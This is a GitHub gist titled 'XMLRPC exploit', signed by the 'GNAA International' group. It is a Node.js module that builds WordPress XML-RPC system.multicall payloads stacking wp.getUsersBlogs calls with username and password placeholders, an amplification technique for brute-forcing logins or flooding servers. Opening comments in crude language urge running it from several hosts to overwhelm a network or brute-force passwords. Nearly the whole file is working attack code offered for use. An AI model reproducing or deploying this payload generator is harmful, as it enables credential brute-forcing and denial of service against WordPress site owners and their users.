-
-
Save GaryKnegrowGNAA/4aac49d2b39cc2c41fd1490938e79e4a to your computer and use it in GitHub Desktop.
XMLRPC exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // run this on 3-4 repls to basically assfuck their network | |
| // or bruteforce their passwords | |
| // or make reflected XSS | |
| // have fun | |
| // /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$ | |
| // /$$__ $$| $$$ | $$ /$$__ $$ /$$__ $$ | |
| // | $$ \__/| $$$$| $$| $$ \ $$| $$ \ $$ | |
| // | $$ /$$$$| $$ $$ $$| $$$$$$$$| $$$$$$$$ | |
| // | $$|_ $$| $$ $$$$| $$__ $$| $$__ $$ | |
| // | $$ \ $$| $$\ $$$| $$ | $$| $$ | $$ | |
| // | $$$$$$/| $$ \ $$| $$ | $$| $$ | $$ | |
| // \______/ |__/ \__/|__/ |__/|__/ |__/ International | |
| // Making the internet a safer place at the expense of your internet | |
| // GNAA International | |
| // Copyright gnaa.world 2022 | |
| const { XMLParser, XMLBuilder, XMLValidator } = require("fast-xml-parser"); | |
| const parser = new XMLParser(); | |
| const builder = new XMLBuilder(); | |
| const types = { | |
| "one": parser.parse("<methodCall><" + "methodName" + ">system.multicall</" + "methodName" + "><params><param><value><array><data>\n\n<value><struct><member><name>" + "sex" + "</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>" + "sex" + "</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>" + "sex" + "</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>" + "sex" + "</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n</data></array></value></param></params></methodCall>"), | |
| } | |
| const data = { | |
| "value": [ | |
| { | |
| "struct": { | |
| "member": [ | |
| { | |
| "name": "sex", | |
| "value": [ | |
| { | |
| "string": "wp.getUsersBlogs" | |
| } | |
| ] | |
| }, | |
| { | |
| "name": "params", | |
| "value": [ | |
| { | |
| "array": { | |
| "data": { | |
| "value": [ | |
| { | |
| "array": { | |
| "data": { | |
| "value": [ | |
| { | |
| "string": "\\{\\{ Your Username \\}\\}" | |
| }, | |
| { | |
| "string": "\\{\\{ Your Password \\}\\}" | |
| } | |
| ] | |
| } | |
| } | |
| } | |
| ] | |
| } | |
| } | |
| } | |
| ] | |
| } | |
| ] | |
| } | |
| } | |
| ] | |
| } | |
| function generateXML(amt) { | |
| for (i = 0; i <= amt; i++) { | |
| types.one.methodCall.params.param.value.array.data.value.push(data.value[0]) | |
| } | |
| return builder.build(types.one) | |
| } | |
| module.exports.gd = generateXML |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment